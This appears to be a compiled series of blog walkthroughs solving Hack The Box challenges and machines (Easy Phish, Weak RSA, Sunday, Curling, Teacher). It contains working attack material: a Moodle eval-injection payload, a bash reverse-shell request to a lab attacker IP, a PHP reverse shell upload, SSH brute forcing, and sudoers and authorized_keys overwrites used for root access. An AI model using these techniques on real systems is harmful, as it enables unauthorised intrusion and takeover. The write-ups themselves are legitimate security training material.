Hello world, welcome to Haxez. Today I’m going to be looking at the retired Easy Phish OSINT challenge from Hack The Box. The challenge description explains:
“Customers of secure-startup.com have been receiving some very convincing phishing emails, can you figure out why?”
Based on the information provided, it seems like this will have something to do with enumerating the DNS records on the domain.
Enumeration
In order to solve this challenge we need to understand how to look up the DNS records associated with a domain. Furthermore, we will need to know which records to query. Once we know that, we should be able to retrieve the flag from the DNS records of the domain. First, we can use NS lookup. Unfortunately, we only get the A record associated with the domain.
Since we know we’re looking for a flag we could try to brute force subdomains, perhaps the flag is a subdomain. However, a more likely approach would be to look at the TXT records as TXT records can contain text and are likely going to be the hiding place of our flag.
First, I start off by performing a nslookup where the query type is set to TXT. This appears to give us the flag, well part of it anyway. As you can see below we have a partial flag claiming that SPF is dead and is always second.
┌─[joe@parrot]─[/mnt/hgfs/MOUNT/HTBCHAL/web_weather_app] └──╼ $nslookup -q=txt secure-startup.com Server: 192.168.80.2 Address: 192.168.80.2#53 Non-authoritative answer: secure-startup.com text = "v=spf1 a mx ?all - HTB{RIP_SPF_Always_2nd"
Second to what? DMARC probably. SPF only checks the “envelope from” address, which can be easily circumvented by attackers who spoof the visible “from” address. DMARC, on the other hand, checks both the “envelope from” and visible “from” addresses to prevent unauthorized use of domain names. It also provides a mechanism for domain owners to receive reports on email authentication failures. DMARC is considered to be a more effective solution for email authentication than SPF alone.
Solving Hack The Box Easy Phish
So, we can now change our query to query the subdomain _dmarc for a TXT record. This value would usually contain information about the configuration of the mail server but in this case, it has the second half of the flag.
Hello world and welcome to haxez, today I will attempt to solve the Weak RSA crypto challenge on Hack The Box. Please note that I got the solution from https://technicalciso.com/. I’m not even going to pretend to know the specifics behind how this all works. I know what encryption is. Furthermore, I know the various types of encryption including RSA. I also know how public and private key pairs work. However, I don’t know how you would break it. I’ve broken SSH keys before using John The Ripper but that’s about it.
Weak RSA Set Up
This challenge requires you to download some files and decrypt the flag so that it can be submitted to Hack The Box. First, we need to do is download the files and extract them. The password for the zip file is ‘hackthebox’. Next, looking at the files we notice that we have a flag.enc file and a key.pub file. I assume that the flag.enc was encrypted using the key.pub file.
Previously, I mentioned public and private key pairs. This is the same type of cryptographic function when you SSH to a server with a private key. Your public key will be stored on the server and then you specify your private key. Next, the server does the maths and if it’s all good then you can access the server. The same theory can be applied to PGP. Someone encrypts a document to your public key which allows you to decrypt the document with your private key.
So, we have a flag.enc (enc probably means encrypted right?), and we have a key.pub. The key.pub is probably the public key used to encrypt the file. The problem is, RSA is an asymmetric cryptosystem. You can encrypt it with your public key but you can’t decrypt it with your public key. If you could, then it would be symmetric encryption where one key is used for both encrypting and decrypting. So, what do we do?
Cracking The Weak RSA Encryption
Turns out, there is a reason why it is a good idea to use long passwords. When it comes to encryption, size does matter. If something has been encrypted with a short encryption key, it may be possible to break it. Shorter likely means fewer sums to do right? That makes sense logically surely. I could be completely wrong, but this is my understanding of it. If the flag was encrypted using a short RSA private key then we might be able to deduce the private key from the public key and then decrypt the file. However, we need a tool.
Now we can use the private key to decrypt the flag and submit the flag to hack the box and win the challenge. Apparently, there is a way to do this with RsaCtfTool but I couldn’t work it out. It wouldn’t output the flag or create a new file. So I will use OpenSSL to decrypt the flag using the private key that RsaCtfTool just magically found for us.
Sunday is a retired easy Linux box that was created by Agent22 on Hack The Box. However, the official walkthrough does categorize it as a medium box so I don’t know who to trust anymore. Furthermore, It was released in 2018. In order to own this box it is recommended that you have an Intermediate knowledge of Linux. Rumour has it that by completing this box you level up several skills. These skills include enumerating users through Finger, brute forcing SSH, and exploiting sudo NOPASSWD. Hello world, welcome to Haxez where today I will be explaining how I hacked Sunday.
Sunday Service Enumeration
Do you want to know why I chose to hack this box today? because today is Sunday and that’s about as complex as my decision-making skills are. I woke up, looked through the list of retired machines, and thought to myself “It’s Sunday, I’m going to hack Sunday”. As a result, I connected to the Hack The Box VPN and spawned the machine. Once I received the target’s IP address, I sent it three pings to check that I could talk to it. Sure enough, the box responded so I blasted it in the face with Nmap. I asked Nmap to scan all ports, request service versions, run default scripts, and save the output in all formats.
After a while, the results were in. In numerical order, ports 79 for Finger, 111 for RPC, 515 for Printer, 6787 for Apache, and 22022 for SSH were open. By exploring the results in more detail, I learned that it was running Apache 2.4.33. Furthermore, the http-title parameter revealed that the box was, in fact, a Solaris-based Operating System.
According to ChatGPT, Solaris is an operating system developed by Sun Microsystems (now Oracle Corporation) that was first released in 1992. It is a Unix-based operating system designed for servers and workstations, known for its scalability, reliability, and advanced features. Solaris offers a robust and secure environment for running enterprise-level applications. It provides features such as advanced file systems, high-performance networking, and built-in virtualization capabilities. Moreover, It also includes features like dynamic tracing (DTrace) for efficient system analysis. It also provides ZFS (Zettabyte File System) for data management and storage. Solaris has been widely used in industries such as finance, telecommunications, and scientific research. This is due to it offering a stable and powerful platform for mission-critical applications.
The finger service, also known as the Finger protocol, is a network service that allows users to retrieve information about other users on a remote system. It was originally designed as a simple method for users to find out basic details about someone logged into a Unix system, such as their username, login status, and the time of their last login. The finger service has been widely used for user identification and system administration purposes. However, due to security concerns and the availability of more advanced alternatives, the finger service has become less prevalent in modern computer networks.
I cloned the finger-user-enum PentestMonkey repository from GitHub and ran the script to see what arguments it required. As a result, I learned that the script can take several arguments. However, I should only need to supply a wordlist with -U and the target IP with -t. I found a suitable wordlist in SecLists and pointed the script at the target. The script ran slowly but after a while, it produced a list of users. While most of the users seemed to be false positives, the users sammy and sunny both seemed to be genuine. For example, both sammy and sunny had an IP address that they’ve logged in from.
I wasn’t sure what to do with these usernames so I started looking at the other open ports. Sadly, I found nothing. Having exhausted all other options, I looked at the official walkthrough. It explained that using Hydra to brute force SSH wouldn’t work due to the outdated SSH key exchange. While the author mentioned that there were tools that could brute force it, they didn’t specify which ones. As a result, I headed over to Mr IppSec’s Youtube channel where he recommended using Patator. So that’s what I did. After running the tool against the box, I received the password of sunday.
Armed with the password, I attempted to SSH to the box. I was expecting to receive an error about the key exchange algorithms but I didn’t. Admittedly, I should have investigated further to understand why I didn’t receive the error but I didn’t. This did make me curious though as to whether Hydra would actually work. So naturally, I tested Hydra and it worked.
Looking at the machine change log I saw that there was a change implemented that fixed an SSH issue. Perhaps that also updated the key exchange algorithms which other users received an error for.
Anyway, I was now on the box but I couldn’t access the user flag. The flag was stored safely within the sammy user’s home directory.
┌──(kali㉿kali)-[/media/sf_OneDrive/SecLists/Passwords] └─$ ssh -p 22022 [email protected] authentication. The latest at Sun May 28 09:34 2023. Last login: Sun May 28 09:29:27 2023 from 10.10.14.33 Oracle Corporation SunOS 5.11 11.4 Aug 2018 sunny@sunday:~$ cat user.txt cat: cannot open user.txt: No such file or directory sunny@sunday:~$ ls /home sammy sunny sunny@sunday:~$ ls /home/sammy user.txt sunny@sunday:~$
Sunday System Enumeration
After logging in to the system I started poking around to see what I could pillage. One of the first things I like to run is sudo -l to list out what the user can do as sudo. As a result, I learned that the user could run /root/troll as root with no password.
Running /root/troll appeared to execute the id command with root privileges as the information it returned was for the root user. However, given its name, I suspected that this was likely a troll. I couldn’t view the file but it was probably calling the id binary by its absolute path. I’m not sure whether it does yet but if so, I wouldn’t be able to use it to perform a path hijack. I’m still learning though so I may have missed something here. My tenses are getting a bit mixed up here so please ignore my disgusting grammar.
Next, I checked the root of the file system to look for anything that wasn’t supposed to be there. I found a backup directory that contained 2 files. One of the files was named shadow.backup which my user had permission to read.
Sunday Lateral Movement
I grabbed the password hash for the sammy user and saved it to a file called sammy.txt. Next, I used John The Ripper with the rockyou wordlist to crack the hash. John automatically identified the hash and after a bit of number crunching, it cracked the hash and found the password cooldude!.
sudo john sammy.txt --wordlist=/usr/share/wordlists/rockyou.txt
Then, I was able to log in to SSH as sammy and capture the user flag.
┌──(kali㉿kali)-[~/HTB/Sunday] └─$ ssh -p 22022 [email protected] ([email protected]) Password: Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13 Oracle Corporation SunOS 5.11 11.4 Aug 2018 -bash-4.4$ cat user.txt ae2▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓4ef
Sunday Privilege Escalation
Once logged in with sammy, I ran sudo -l again to see whether sammy could run anything as root. Fortunately, it seemed sammy could run wget with root privileges. I used wget to read local file system files, specifically the root users crontab and the /root/troll script that sunny had access to. While the output is rather awful even with filtering, I could see that the /root/troll script was using the absolute paths.
The root user crontab showed that there was a job that copies the original troll file back to /root/troll location. I couldn’t workout the frequency that it was doing this as the formatting was all jank but there is definitely a time window in which the exploit needs to run.
On my attack box, I created a simple bash script named troll which just executed bash.
#!/usr/bin/bash bash
Then, I started a Python web server in the directory where the script was located so that I could download it from the target box.
python3 -m http.server 80
Once the payload was ready, I opened two terminals. One as the sunny user and one as the sammy user. I prepopulated the sudo /root/troll command on the sunny user. Then on the sammy user, I populated a command to use sudo wget to download and save the payload to /root/troll. Then, in quick succession, I hit return on the wget command, switched to the sunny terminal, and hit return on the /root/troll command. On the second attempt, the payload replaced the /root/troll script with my payload and elevated me to the root user.
Finally, I was able to capture the root flag and complete the box.
sunny@sunday:~$ sudo -l User sunny may run the following commands on sunday: (root) NOPASSWD: /root/troll sunny@sunday:~$ sudo /root/troll root@sunday:/home/sunny# whoami root root@sunday:/home/sunny# id uid=0(root) gid=0(root) root@sunday:/home/sunny# cat /root/root.txt bf6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓cce
Sunday Learnings
This was a nice box to complete on a Sunday morning. It didn’t require much enumeration and for once, the attack vector was SSH. I liked that there was a lateral movement thrown in here to get the user flag. I think without it, the user flag would have been too easy to get. Obviously, the user plays a role in the privilege escalation too but the lateral movement was a nice touch.
I thought the privilege escalation was fun as it relied on more than just working out how to do it. Granted, the main issue here was users having access to tools that could be executed with root privileges. However, I wonder whether you could consider this a race condition weakness too? Either way, it was a nice touch having to try and get both commands to execute at almost the same time. I had a lot of fun on this one! thanks for the box!
Curling is an easy Linux box created by l4mpje on Hack The Box and was released in 2019. To complete this box it is recommended that you have enumeration skills. By completing this box you will learn cURL usage and how to analyze hex dumps. Hello world, welcome to Haxez where today I will be explaining how I hacked Curling.
Curling Enumeration
First I connected to the Hack The Box VPN and spawned the box. Once I received the IP address of the target, I pinged it from my attack box to check that I could talk to it. The ping came back with a time to live of 63. If I didn’t know it was Linux, I would now have a good idea as the default TTL is 64. With the formal greeting over with, it was time to start asking some personal questions. I interrogated the box with Nmap by scanning all ports and requesting service versions. Additionally, I told Nmap to hit it with all default scripts and gave it a minimum packet rate of 10,000 pps. That many packets per second isn’t recommended for corporate networks but as this is Hack The Box, YOLO.
The results came back and reported that ports 22 for OpenSSH 7.6 and 80 for Apache 2.4.29 were open. Furthermore, Nmap suspected that box was running Ubuntu. I could have added the -O flag here to perform more aggressive OS detection but I didn’t think it was needed. I now had two attack vectors. If SSH supported password authentication, I could use Hydra or CME to brute force the login. However, as I had no idea what the users were so that would have taken an eternity. Therefore, the path forward had to be the web application on port 80.
I launched Burp Suite and opened the built-in browser. Sidenote, I like to use Burp even when not performing an attack as it records everything and builds a sitemap. I navigated to the IP address in the Burp browser and… nothing happened. Remember when I said earlier that a minimum packet rate of 10,000 packets per second wasn’t recommended? This is why, my Nmap results should have identified that the application was using the Joomla Content Management System. Instead, I think it straight-up DoS’d the box. Either that or something was wrong with my internet. I respawned the box and ran Nmap again. As you can see, it was running Joomla.
sudo nmap -sC -sV -p- 10.129.178.192 -oA Curling2
Now that the box was playing nice, I headed to the IP address in the Burp browser again. Once the page loaded, the title immediately caught my eye. The title of the application was Cewl Curling Site. For those who aren’t cewl, cewl or custom wordlist generator is a ruby tool that crawls an application and produces a wordlist. It isn’t CMS or framework specific so you can use it against any application.
Crawling With Cewl
It seemed pretty clear that the box creator wanted me to use cewl so that’s exactly what I did. I told cewl to write to an output file called cewl.txt. Then, I specified the IP address of the Curling box and was ready to go. However, since this is all about learning, I thought why not proxy it through Burp? For that reason, I added the proxy host and proxy port arguments and hit return. You can see from the screenshot below that cewl successfully created a wordlist that we might be able to use later. I haven’t included a screenshot of Burp because there isn’t much to show but it seemed to work fine.
I thought it would be a good idea to gather some more information before I started battering the door down with the heavy artillery. The application could have had some form of web application firewall or brute force protection plugin. Furthermore, that plugin could ban IP addresses that it catches performing brute force attacks. OWASP JoomScan is a Perl tool that detects and analyses vulnerabilities associated with the Joomla Content Management System. I assume it was built by the OWASP foundation but you know what they say about assumptions. You can google that yourself if you’re interested.
I pointed JoomScan at the URL and told it to enumerate components. Additionally, I also told JoomScan to go through my Burp Suite proxy. I’m not sure whether this can impede the accuracy of the results, I sure hope not. However, I think it’s good practice to proxy your tools as it keeps an accurate record of everything sent to the application. You can then review the output to get a better understanding of what the tool is doing. Furthermore, if your boss looks through your tool output, it looks like you’ve actually done some work.
JoomScan reported back that it didn’t detect a firewall (good news) but that the core version wasn’t vulnerable (bad news). However, it did identify the administrator login portal (good news) and that there were several directories that had directory listing enabled (also good news).
I ran a few other tools against the application but they didn’t find what the creator intended us to find. To explain, every Web Application testing methodology will likely have a section in it for reviewing the page source manually. The reason for this is that developers may have left comments behind from the development process. There’s probably a tool out there that does it or you can do it manually by right-clicking the page and asking to view the page source. However, it’s Saturday morning and I don’t have much planned, so why not ask ChatGPT to build one? Everyone, I’d like to introduce you to… drum roll… comment crawler. Ok, it’s basic and doesn’t recursively crawl the application but it does what it needs to.
#!/bin/bash # Function to display a progress bar function show_progress() { local progress local total_length local completed_length local bar_length local percentage progress=$1 total_length=50 completed_length=$((progress * total_length / 100)) bar_length=$((total_length - completed_length)) percentage=$((progress * 100 / total_length)) printf "\r[%-${completed_length}s%${bar_length}s] %3d%%" "█" "" "$percentage" } # Print script name and ASCII art echo "Comment Crawler" echo "" echo " / \\" echo " [ o o ]" echo " \\=_=/" echo " / \\" echo " /_____\\" echo "" # Check if URL/IP address is provided as an argument if [ -z "$1" ]; then echo "Please provide a URL or IP address." exit 1 fi # Store the supplied URL/IP url_ip=$1 # Fetch the page source page_source=$(curl -s "$url_ip") # Extract and report comments using grep comments=$(echo "$page_source" | grep -oP '<!--[\s\S]*?-->') # Check if any comments are found if [ -z "$comments" ]; then echo "No comments found on $url_ip." else echo "Comments found on $url_ip:" # Calculate total number of comments total_comments=$(echo "$comments" | wc -l) # Set initial progress to 0 progress=0 # Iterate through each comment and display progress bar while IFS= read -r comment; do echo "$comment" # Increment progress by 1 for each comment progress=$((progress + 1)) # Display progress bar show_progress $((progress * 100 / total_comments)) done <<< "$comments" # Move to the next line after the progress bar is complete echo "" fi
After running the tool against the target URL, I found a comment mentioning a file named secret.txt. I have no idea what the ASCII art is by the way, I asked ChatGPT to create some and this was the result. It looks like a rat wearing a party hat.
Anyway, navigating to secret.txt gave me the following string which I’m going to assume is the password for the login.
Q3VybGluZzIwMTgh
Curling Web Application Username Bruteforce
I could be barking up the wrong tree but I navigated to the administrator login and supplied some test credentials. I’m using the word test for the username and password here but it’s probably better to use something that you can easily filter for.
After clicking login, I headed to Burp and located the POST request that I just submitted. Then, I sent the request to the intruder tool and use the clear button to clear the automatically created payload points. Once the payloads were clear, I highlighted the value of the username and clicked add to add a payload point. Finally, I replaced the value of the password parameter with the value obtained from the secret.txt file.
Next, I navigated to the payloads tab and clicked load. Once the file manager window popped up, I navigated to the list that the cewl tool created for us earlier.
I ran the attack and sorted by size hoping to see that one of the responses had a different size to the others. As I’m using the community version of Burp suite, the attack process is painfully slow compared to the professional version. I waited until the attack was complete and… nothing.
Decoding The Secrets Of Curling
Now, it’s at this point that you might go look for another attack vector. For example, you might go back to enumerating the box and waste countless hours running unnecessary tools. You might go tumbling down a rabbit hole like Alice and start wondering what you’re doing with your life. However, I didn’t do that. I base64 decoded the string to reveal the password of:
Curling2018!
I modified the request that I already had in the intruder tool. However, I probably should have sent a new request so that the different attack configurations are saved in the Burp file. Furthermore, it would have refreshed the cookie which could have timed out before I started the next attack. Anyway, I launched the attack again, and as you can see from the results below, the username Floris had a different response length than all the other responses. It’s a good bet that this is the correct username and password combination.
Curling Foothold
The username and password combination was correct, and I could log in to the Administrator portal. Once logged in, I clicked the templates option under the configuration subheading on the left side of the page. Then, I clicked the protostar template and clicked the button to add a new file. I named the file haxez and selected the PHP file extension. Next, I populated the file with the pentestmonkey reverse shell and modified the IP address to my attack box.
I could have snuck a command shell into an existing template page but I try not to use command shells unless absolutely necessary. While the chances are almost non-existent, I don’t like the idea of intentionally creating a public-facing vulnerability that a threat actor could use to exploit a system. If you put a command shell on a client’s system and they don’t remove it, then someone finds it and exploits it… your legal team might be getting in touch. Using this reverse shell allows me to control who it connects back to.
I saved the file and then started a NetCat listener on port 443. Then, I used curl to request the file which caused the reverse shell to connect back to my listener. I now had a foothold on the box but sadly wasn’t able to capture the user flag.
While looking for the user flag, I noticed an interesting file in Floris’s home directory. The file was named password_backup and running the file command against it informed me that it was an ASCII text file. If I said I immediately knew what to do with this file, I would have been talking out of my backside. I genuinely had no idea. I knew what I was looking at but didn’t know what to do with it. How do you even ask Google what to do here? Google, wot do wit hex dump? I looked at the walkthrough.
Moving Laterally
This next step felt like a rabbit hole. I’ve been tricked by box creators on Hack The Box before. I base64 decoded a string about a billion times only to receive a cheeky message telling me it was a rabbit hole. Thanks for that. Anyway, this wasn’t a rabbit hole but it did require multiple steps to get a human-readable output. I’m not going to pretend I know the specifics of each format and how to decompress it. However, I will read about them later today once I run out of distractions. The process was as follows:
First, I ran xxd against the password_backup and redirected the output to a file called output. Then, I ran file against the output file which told me it was a bzip2 file.
After that, I ran bzcat on the on the output file and redirect the output to a file called output2. Then, I ran file against the output2 file which told me it was gzip compressed data.
www-data@curling:/tmp$ bzcat output > output2 www-data@curling:/tmp$ file output2 output2: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix
Next, I ran zcat against output2 and redirected the output to a file named output3. Running file against output3 told me it was a bzip2 file.
Are we there yet? I ran bzcat on output3 and redirect the output to a file named output4. File informed me that the format of output4 was a tar archive.
Finally, I extracted the archive with tar, and lo and behold, I had a human-readable file in the form of a password.txt file.
www-data@curling:/tmp$ tar -xf output4 www-data@curling:/tmp$ ls output output2 output3 output4 password.txt password_backup www-data@curling:/tmp$ cat password.txt 5d<wdCbdZu)|hChXll
Then, I was able to SSH to the box as the user Floris and capture the user.txt flag.
┌──(kali㉿kali)-[~/HTB/Curling] └─$ ssh [email protected] [email protected]'s password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-156-generic x86_64) Last login: Wed Sep 8 11:42:07 2021 from 10.10.14.15 floris@curling:~$ cat ~/user.txt 4f6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓688
Curling More System Enumeration
This privilege escalation technique blew my mind when I saw IppSec do it so I want to repeat his method of rooting the box. You can see from the screenshot below that floris has a directory within her home directory owned by the root user but also owned by the floris group.
Dipping into that directory and viewing the contents of the files I noticed that the dates on the files were today’s date. Furthermore, whatever was specified in the input file, was output in the report file. Ok, bad explanation. Let me explain further, if I cat the input file you can see the following:
To me, this suggested that there was a cronjob running that was executing something that looked to the input file for the value of a parameter. The contents of that file were then output to the report file. In order to test this theory, I span up a Python webserver on my attack box.
python3 -m http.server 80
Next, I modified the contents of the input file to point to my host’s IP address.
url = "http://10.10.14.33/haxez-was-here"
Sure enough, after a moment or two, the target box sent a get request to my webserver. I checked the report file and it contained the 404 message produced by my webserver.
Curling Privilege Escalation Setup
With the proof of concept confirmed, I assumed the cronjob was using curl and changed the command in the input file so that it would retrieve the root user’s cron. This worked, and as you can see from the screenshot below, it’s using the curl command with the -K argument to read arguments from a text file. It’s also writing the output to the report file with the -o argument. Then, underneath that, there is a cleanup script with a delay on it that reverts the input file back to its original state.
This is where it gets crazy! Following IppSec’s video, I copied the sudoers file on my attack box to my current working directory. Next, I edited the sudoers file and added floris as a sudo user under the root user.
# User privilege specification root ALL=(ALL:ALL) ALL floris ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL
Next, I saved the file and started my Python webserver again so that it was serving the sudoers file.
python3 -m http.server 80
With the server running, I switched to the target box tab where I was logged in as floris through SSH. I modified the input file so that it grabs the content of the sudoers file and saves it to /etc/sudoers.
I then waited for the GET request to my webserver which it eventually did. Unfortunately, this method kept resulting in errors. I’ve seen other writeups where this worked so I’m not sure why this happened. I played with the permissions of the file on the attack box but nothing seemed to work.
Curling Privilege Escalation Attempt 2
In the end, I did it the old-fashioned way and dropped a public key in the root user’s authorized_keys file. I generated a public and private key on my attack box and then served the public key with the Python webserver. Then, I modified the input file on the target machine and added the following code to it.
I waited for the target to send the GET request to my attack box. After a few moments of suspenseful waiting, the request came in and resulted in an HTTP 200 message. You can see from the screenshot below that I was getting 404 errors on the sudoers due to permissions. I did fix it but it still didn’t work.
Now for the moment of truth! I tried to SSH to the box as the root user with the private key. IT WORKED!
┌──(kali㉿kali)-[~/HTB/Curling] └─$ ssh -i root [email protected] Last login: Tue Aug 2 14:22:36 2022 root@curling:~# cat root.txt af7▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓97b
Curling Learnings
In my opinion, this was a great box and was well thought out. The enumeration at the start had me checking everything. I tend to get lazy and miss things during the initial information-gathering phase so this helped me shine up those skills. I don’t often get to play with Joomla so getting to go in a tinker with it was fun. The reverse shell worked the first time and was solid. The method to get the password for lateral movement was interesting and gave me a good laugh.
I’m disappointed that I couldn’t get the initial privilege escalation method to work. I’m still not sure why it wasn’t working. I’ve stopped the box now but I should have gone back and checked the sudoers file to see what state it was in. Overall, I had a lot of fun with this box, and at no point did I get frustrated or have to step away from it. Everything went smoothly except for the final privilege escalation. Thanks for the box, it was a lot of fun.
Teacher is an easy Linux box created by mrh4sh on Hack The Box. The official walkthrough states that it’s a medium box. However, it is categorized as an easy box in the machines section. It is recommended that you have basic Linux and MySQL knowledge to complete this box. By completing this box you will learn Website Enumeration, Password Brute-Forcing, Moodle Quiz Module Exploitation, Database Enumeration, Password Cracking, and Linux Symlink Misconfiguration. Hello world, welcome to haxez where today I will be explaining how I hacked Teacher.
Teacher Enumeration
First, I spawned the box and connected my attack box to the Hack The Box VPN. Once connected, I sent a ping request to the box to ensure it was online. Then I performed a Nmap scan to check what ports were open. Furthermore, I requested the service versions, asked for default scripts to be run, and that the minimum packet rate was 10000. Finally, I saved the output in all formats to files called teacher. From the results, I learned that only port 80 for HTTP was open and that it was running Apache 2.4.25.
Since port 80 was the only open port, I headed over to the application. There wasn’t a great deal of functionality offered by the application. It seemed fairly generic with few pages that I could interact with. For an application that calls itself Blackhat Highschool, it seemed a bit too clean. I was hoping for something dark and edgy.
Moving on, I ran whatweb against the application which told me it was an HTML 5 application with JQuery 1.11.1. Next, I navigated to index pages with various different extensions (index.html, index.php). Sure enough, the one that loaded the main page was index.html.
As I didn’t have much to go on, I decided to run gobuster to look for hidden content. Perhaps there was a hidden directory or a secret file telling me that the princess is in another castle. I told gobuster to perform a directory attack using the raft-small-words.txt wordlist in SecLists. Furthermore, I also asked it to try various different extensions and set the thread count to 50.
Moodle
As a result, I learned that there was a directory called Moodle. Their GitHub page explains that Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Moodle is used for blended learning, distance education flipped classrooms, and other online learning projects in schools, universities, workplaces, and other sectors. I headed to the Moodle directory but received an error because it redirected to teacher.htb. Therefore, I added the IP address and teacher.htb domain to my /etc/hosts file and revisited the directory. Abracadabra, the site started loading.
Picture In Picture
I honestly don’t know what to say about this part of the box. I know I wouldn’t have found it if it wasn’t for a walkthrough. It’s not something I regularly check. I found Moodle but had no way to log in. However, directory listing on the images directory was enabled. Visiting each of the images loaded an image as expected, except for 5.png.
I downloaded the picture locally and used less to review the contents of the file. It wasn’t an image at all. It appeared to be a helpdesk ticket. I can’t fathom how a helpdesk ticket would have ended up on the website. For my own sanity, I’m going to pretend that the helpdesk agent and web developer are the same person. Furthermore, I’m also going to pretend that they accidentally renamed the wrong file and uploaded it. The ticket gave me the username Giovanni and a partial password of Th4C00lTeacha.
Moodle Bruteforce
I launched Burp and headed back to the Moodle login page. Next, I populated the login form with the credentials provided in the support ticket. Then, I clicked submit and located the login request in Burp’s HTTP history. I sent the request to the intruder tool and added a character to the end of the password. Then, I highlighted that character and added the payload characters.
Next, I navigated to the payload tab but because I’m using Burp community edition, I had to create my own payloads. As a result, I combined several wordlists from the SecLists fuzzing directory so that they contained numbers 0 to 9, all alphabetical characters (lower and uppercase), and all special characters.
I then click the start attack button and watched as Burp went through each payload, appending it to the end of the password. There are other tools that I could have used to do this such as WFUZZ or FFUF but I know how to use Burp so I thought it was the best option. An indication that a specific payload has had a different result is the length of the response produced by the application. The screenshot below shows that most of the responses were 868 characters. However, the payload with the # symbol produced a response with 993 characters.
Evil Teacher Vulnerability
I wasn’t sure what the Moodle version was. I ran what web again against the teacher.htb domain Moodle directory but got nothing. As a result, I looked on Google and found that the Moodle version can be found from the Moodle Docs for this page link at the bottom of a course page. This told me that it was Moodle version 3.4.
There is a vulnerability in Moodle 3.4 with the CVE designation CVE-2018–1133. The vulnerability is also known as Evil Teacher. It could allow a user with the teacher role to perform code execution by creating a quiz. SonarSource has an excellent writeup on it so I’m not going to attempt to explain it in too much detail. Essentially, formulas are passed to an eval function which allows for code execution. So if a threat actor can create a quiz with a malicious formula in one of the questions, they may be able to execute code.
Teacher Foothold
I navigated to the algebra page and enabled editing. Next, I used the add an activity or resource option to add a quiz to the Topic 1 section.
I gave the quiz a name and description and clicked next.
After that, I clicked the little blue add link on the next page and chose to add a question. Then, I selected the calculated question type as that would be likely to have the option to add a formula. Finally, I pasted the working exploit into the formula and changed the grad value to 100%.
/*{a*/`$_GET[0]`;//{x}}
It was time for the moment of truth. I captured the request with Burp and sent it to the repeater tool. Next, I appended the URL with a payload that would ping my box. I started tcpdump to listen out for ICMP packets that hit my tun0 adaptor and clicked send.
GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=/bin/ping+10.10.14.34 HTTP/1.1
sudo tcpdump -i tun0 -n icmp
To my surprise, it worked the first time. I started receiving ping packets from the target box.
Now that I had code execution, I modified my payload to a reverse shell, started netcat, and was able to pop a reverse shell.
GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D8%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=8&0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.34/9001+0>%261' HTTP/1.1
Teacher System Enumeration
I couldn’t find the user flag once logged in so I checked the home directory and that there was a user called giovanna. That’s probably where the user.txt file is. I could try switching to that user with the password we logged in to Moodle with. However, I decided to take a look at the database first. I pulled the username and password from the /var/www/html/moodle/config.php file. After logging in, I was able to grab usernames and password hashes from the mdl_users table.
select id,username,password from mdl_user;
I copied the Giovannibak hash to a file on my attack box and used John to crack it with the rockyou wordlist.
I was then able to switch to the giovanni user and capture the user.txt flag.
www-data@teacher:/var/www/html/moodle$ su giovanni su giovanni Password: expelled giovanni@teacher:/var/www/html/moodle$ cd ~/ cd ~/ giovanni@teacher:~$ ls ls user.txt work giovanni@teacher:~$ cat user.txt cat user.txt 881▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓823
Teacher Privilege Escalation
The box keeps crashing meaning I have to do the above process all over again. As a result, the following explanation is going to be brief because I simply can’t be bothered with this box anymore. Looking at the time stamps on the user’s home directory I could see that something was changing fairly frequently. I set up a Python webserver and download pspy onto the box. Running pspy I noticed that a backup script was running.
The backup script was changing to the /home/giovanni/work directory and then backing up the courses directory. It was then changing the directory to /home/giovanni/work/tmp and changing the permissions to 777.
giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh #!/bin/bash cd /home/giovanni/work; tar -czvf tmp/backup_courses.tar.gz courses/*; cd tmp; tar -xf backup_courses.tar.gz; chmod 777 * -R;
You may have to forgive me here as I’ve reached the end of my tether. I had to restart the box about 5 times due to it crashing repeatedly. All I did was create a symbolic link from courses to /root. That way, when the script runs, the contents of the root directory will be backed up to work/tmp/courses which will allow me to capture the root flag.
giovanni@teacher:~/work$ ln -s /root courses giovanni@teacher:~/work$ ls -laSh courses giovanni@teacher:~/work$ ls courses courses.bak tmp giovanni@teacher:~/work$ cd tmp giovanni@teacher:~/work/tmp$ ls backup_courses.tar.gz courses giovanni@teacher:~/work/tmp$ cd courses giovanni@teacher:~/work/tmp/courses$ ls algebra root.txt giovanni@teacher:~/work/tmp/courses$ cat root.txt cat root.txt 63d▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓3cc
Teacher Learnings
Ironically, I didn’t learn a lot from the teacher box. The Moodle exploit was interesting as I hadn’t done it before but that was about it. Unfortunately, I have to say that this is one of my least favorite boxes that I’ve completed so far. The concept is nice but the box was too flakey, well for me it was anyway. It seemed that the slightest mistake in syntax caused the box to throw a tantrum. This is on a private VIP box too so not like other people were hitting it.
I think enabling SSH would have made the box more tolerable as it would have allowed quick access to the user. I wouldn’t want this on every box but having to repeat the Moodle exploit every time the box decided to stop responding made me want to quit. Also what was up with the credentials hidden in the image… Oh well, it’s done now and I can put it behind me. Glad I did it but didn’t enjoy it. Thanks for the box!
ServMon is an easy Windows box created by dmw0ng on Hack The Box. To own this box it is recommended that basic web enumeration, basic Windows enumeration, and SSH tunneling skills. By completing this box you will learn the following skills exploiting NVMS-1000, exploiting NSClient++, and SSH password spraying. Hello world, welcome to haxez where today I will explain how I hacked ServMon.
ServMon Service Enumeration
